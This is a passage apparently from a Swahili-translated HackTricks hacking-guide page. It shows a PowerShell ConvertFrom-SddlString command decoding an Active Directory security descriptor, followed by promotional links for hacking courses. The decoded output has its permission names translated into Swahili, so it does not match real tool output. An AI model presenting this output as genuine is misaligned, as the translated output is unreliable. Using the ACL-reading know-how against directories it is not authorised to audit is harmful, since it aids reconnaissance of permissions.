PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
Mmiliki : BUILTIN\Administrators
Kikundi : BUILTIN\Administrators
DiscretionaryAcl : {Kila mtu: AccessDenied (AndikaData), Kila mtu: AccessAllowed (AndikaExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (TengenezaMajedwali, TekelezaKawaida, SomaRuhusa,
Pitisha, AndikaExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(TengenezaMajedwali, TekelezaKawaida, SomaKawaida, SomaAtribyuti, SomaRuhusa,
AndikaExtendedAttributes)...}
SystemAcl : {Kila mtu: SystemAudit SuccessfulAccess (BadilishaRuhusa, ChukuaUmiliki, Pitisha),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (AndikaAtribyuti), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (AndikaAtribyuti), Kila mtu: SystemAudit SuccessfulAccess
(Pitisha)...}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>